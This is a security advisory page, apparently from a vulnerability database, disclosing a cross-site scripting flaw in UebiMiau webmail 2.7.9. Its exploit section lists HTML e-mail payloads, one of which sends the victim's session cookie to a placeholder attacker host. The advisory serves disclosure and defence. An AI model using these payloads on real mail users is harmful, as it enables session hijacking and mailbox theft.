UebiMiau Webmail System Security Vulnerability

2006.01.30
Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

I.Vulnerability UebiMiau Webmail System Cross Site Scripting Vulnerability II.Vendor Aldoir Ventura III.Affected Systems * UebiMiau 2.7.9 (latest release) and probably previous versions. IV.About UebiMiau is a simple, yet efficient mail reader (webmail) supporting both IMAP and POP3 without dependence of any PHP's extra modules or database (http://www.uebimiau.org). V.Description UebiMiau does not filter HTML e-mail messages correctly, it's possible to inject mailicious scripting codes to an e-mail. An attacker is able to hijack a user's session and access victim's mailbox just by sending a specially crafted e-mail message. This is a dangerous situation because there is no need to click a link in some cases, client-side code executing when the user opens crafted e-mail. VI.Exploit <img src="javascript:location.href='http://ATTACKER/StealSessionData/?'+docum ent. cookie;" /> <img src="javascript:[XSS];" /> <a href="javascript:location.href='http://ATTACKER/StealSessionData/'">test link 1</a> <a href='http://ATTACKER/StealData/'>test link 2</a> VII.Vulnerability Status * Vulnerability discovered on 2006-01-12. * Vendor notified on 2006-01-12. * No response from vendor, vulnerability published on 2006-01-28. VIII.Workarounds * No vendor-supplied patch is currently available. IX.Credits M.Neset KABAKLI Wakiza Software Technologies neset{at}wakiza{dot}com www.wakiza.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top